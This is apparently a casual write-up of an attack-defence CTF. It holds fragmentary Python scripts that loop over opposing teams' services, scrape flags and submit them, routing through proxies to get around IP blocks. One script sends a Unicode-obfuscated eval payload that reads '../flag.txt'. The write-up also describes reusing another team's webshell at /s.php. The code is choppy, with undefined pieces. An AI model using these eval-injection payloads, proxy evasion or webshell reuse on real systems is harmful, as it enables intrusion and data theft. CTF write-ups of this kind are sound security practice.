life was so hectic it took me like a year later to write this, enjoy!
so theres a specific instance where you can submit the flag, after you managed to attack/defend ur instances if im not mistaken i dont remember most of it already.
and every tick there will be new flags generated for each team.
attack points | 2
defence points | -1 (if the other team submit your flag)
Game Server - 10.10.100.10 Submit flag via nc 10.10.100.10 6666
Flag Submission
in order to submit the flag u need to send it to your instance, since it can be a bit tedious cuz there are way too many flags we decided to make an automated script to submit it
# Proxy list - Add your proxies here # Format: "http://proxy_ip:port" or "http://user:pass@proxy_ip:port" PROXIES_LIST = [ "http://10.10.130.23:12378", # Add more proxies here if you have them ]
# Set to True to enable proxy usage USE_PROXY = True# Proxy is now enabled
SUBMIT_HOST = "10.10.100.10" SUBMIT_PORT = 6666 INTERVAL = 60# 1 minute in seconds (change to 240 for 4 minutes)
defget_random_proxy(): """Get a random proxy from the list""" ifnot PROXIES_LIST ornot USE_PROXY: returnNone
# Make request with or without proxy response = requests.post( target, headers=headers, data=data, timeout=10, proxies=proxies )
print(f" [*] Team {team}: Status {response.status_code}")
if response.status_code == 200: found_flags = re.findall(r'SIBER25_[A-Za-z0-9+/=]+', response.text) if found_flags: flag = found_flags[-1] print(f" [+] Team {team}: {flag}") flags.append(flag) else: print(f" [-] Team {team}: No flags found in response") elif response.status_code == 403: print(f" [!] Team {team}: FORBIDDEN - IP might be blocked!") else: print(f" [-] Team {team}: Unexpected status code")
except requests.exceptions.Timeout: print(f" [-] Team {team}: Timeout after 10 seconds") continue except requests.exceptions.ConnectionError as e: print(f" [-] Team {team}: Connection Error - {e}") continue except requests.exceptions.ProxyError as e: print(f" [-] Team {team}: Proxy Error - {e}") continue except requests.exceptions.RequestException as e: print(f" [-] Team {team}: Request Error - {e}") continue except Exception as e: print(f" [-] Team {team if team else'Unknown'}: Unexpected Error - {type(e).__name__}: {e}") continue
print(f"\n [*] Completed scanning all {len(TARGETS)} targets") return flags
defsubmit_flags(flags): """Submit flags to the server""" ifnot flags: print(" [-] No flags to submit!") return
if flags: submit_flags(flags) else: print(" [!] No flags collected this round")
print(f"\n[*] Waiting {INTERVAL} seconds until next run...") print("=" * 70)
time.sleep(INTERVAL) iteration += 1
except KeyboardInterrupt: print("\n\n[!] Stopped by user") break except Exception as e: print(f"\n[-] Error in main loop: {type(e).__name__}: {e}") print(f"[*] Retrying in {INTERVAL} seconds...") time.sleep(INTERVAL)
if __name__ == "__main__": main()
if you noticed we added proxy feature cuz some of the other teams decided to filter our ip address from visiting their website.
u one cheeky bastard @vicevirus.
oh and also since the flag were shown in the output of the page, we decided to keep on sending request to clear the flag by sending request to the clear endpoint continously
#!/usr/bin/env python3 """ fetch_flags_loop_unicode.py Continuously (every 2 minutes) connect to each target host:port, send the exact Unicode expression provided by the user, parse the returned flag line, and append each result (with timestamp + host) to flags.log. Then submits all collected flags. Usage: python3 fetch_flags_loop_unicode.py """
import socket import time import re import datetime import signal import sys
# Submission configuration SUBMIT_HOST = "10.10.100.10"# *** CHANGE THIS to your submission server SUBMIT_PORT = 6666# *** CHANGE THIS to your submission port
# *** The user-required expression (exactly as provided) *** EXPRESSION = r'𝘰𝘱𝘦𝘯("\056\056\057\146\154\141\147\056\164\170\164").𝘳𝘦𝘢𝘥()' # we'll send a newline after it so the remote prompt processes it EXPRESSION_TO_SEND = EXPRESSION + "\n"
# Regex to extract the flag from the returned text. Example lines: # Result: Flag for 54 is SIBER25_Q1RGLS+... FLAG_RE = re.compile(r'Flag for \d+ is (\S+)')
deffetch_flag_from(host, port=PORT): """ Connects to host:port, waits for banner/prompt, sends EXPRESSION_TO_SEND, reads response and returns (flag_or_none, raw_text). """ try: with socket.create_connection((host, port), timeout=SOCKET_TIMEOUT) as s: s.settimeout(SOCKET_TIMEOUT) # read initial banner until prompt or timeout banner = b'' try: whileTrue: chunk = s.recv(4096) ifnot chunk: break banner += chunk ifb'Expression'in banner orb'Expression >'in banner: break except socket.timeout: pass
# send the exact unicode expression s.sendall(EXPRESSION_TO_SEND.encode('utf-8'))
# read response (a few KB is usually enough) resp = b'' try: whileTrue: chunk = s.recv(4096) ifnot chunk: break resp += chunk # simple heuristic: stop after we've seen "Result:" and a newline ifb'Result:'in resp andb'\n'in resp.split(b'Result:',1)[1]: break except socket.timeout: pass
text = (banner + resp).decode('utf-8', errors='replace') m = FLAG_RE.search(text) if m: return m.group(1), text else: # fallback: capture whatever follows "Result:" if present alt_match = re.search(r'Result:\s*(.+)', text) if alt_match: alt = alt_match.group(1).strip().splitlines()[0] return alt, text returnNone, text
except Exception as e: returnNone, f"ERROR: {e}"
deflog_result(host, flag, raw): ts = datetime.datetime.utcnow().isoformat() + "Z" withopen(LOGFILE, "a", encoding="utf-8") as f: f.write(f"{ts}{host}{flag}\n") f.write(f"{ts}{host} RAW:\n") for line in raw.splitlines(): f.write(f"{ts}{host} RAW: {line}\n") f.write("\n")
defsubmit_flags(flags): """Submit flags to the server""" ifnot flags: print(" [-] No flags to submit!") return
for host in HOSTS: ifnot running: break print(f" -> Connecting to {host}:{PORT} ...", end="", flush=True) flag, raw = fetch_flag_from(host, PORT) if flag and flag != "<no-flag>": print(f" FLAG: {flag}") log_result(host, flag, raw if raw else"<no raw>") collected_flags.append(flag) else: print(" no flag found / error") log_result(host, "<no-flag>", raw if raw else"<no raw>")
# Submit all collected flags if collected_flags: print(f"\n [+] Collected {len(collected_flags)} flag(s)") submit_flags(collected_flags) else: print("\n [-] No flags collected this iteration")
ifnot running: break
# sleep with graceful-shutdown checks print(f"\n [*] Sleeping for {SLEEP_SECS} seconds...") slept = 0 while slept < SLEEP_SECS and running: time.sleep(1) slept += 1
print("\nExited loop. Goodbye.")
if __name__ == "__main__": main_loop()
Appetizer Port 5555
based from my understanding i believe that it is related to sqli, which you can upload a webshell, which eventually leads to rce.
we didn’t solve it the intended way but we saw someone left his trail in one of the services so we take a look at the webhook and turns out it shows that the webshell is at /s.php lol
if flags: print("\n[*] Submitting flags to server...") submit_flags(flags) else: print("\n[-] No flags to submit!")
print(f"\n[*] Waiting 2 minutes until next run...") print("=" * 70)
time.sleep(INTERVAL) iteration += 1
except KeyboardInterrupt: print("\n\n[!] Stopped by user") break except Exception as e: print(f"\n[-] Error in main loop: {e}") print(f"[*] Retrying in 2 minutes...") time.sleep(INTERVAL)
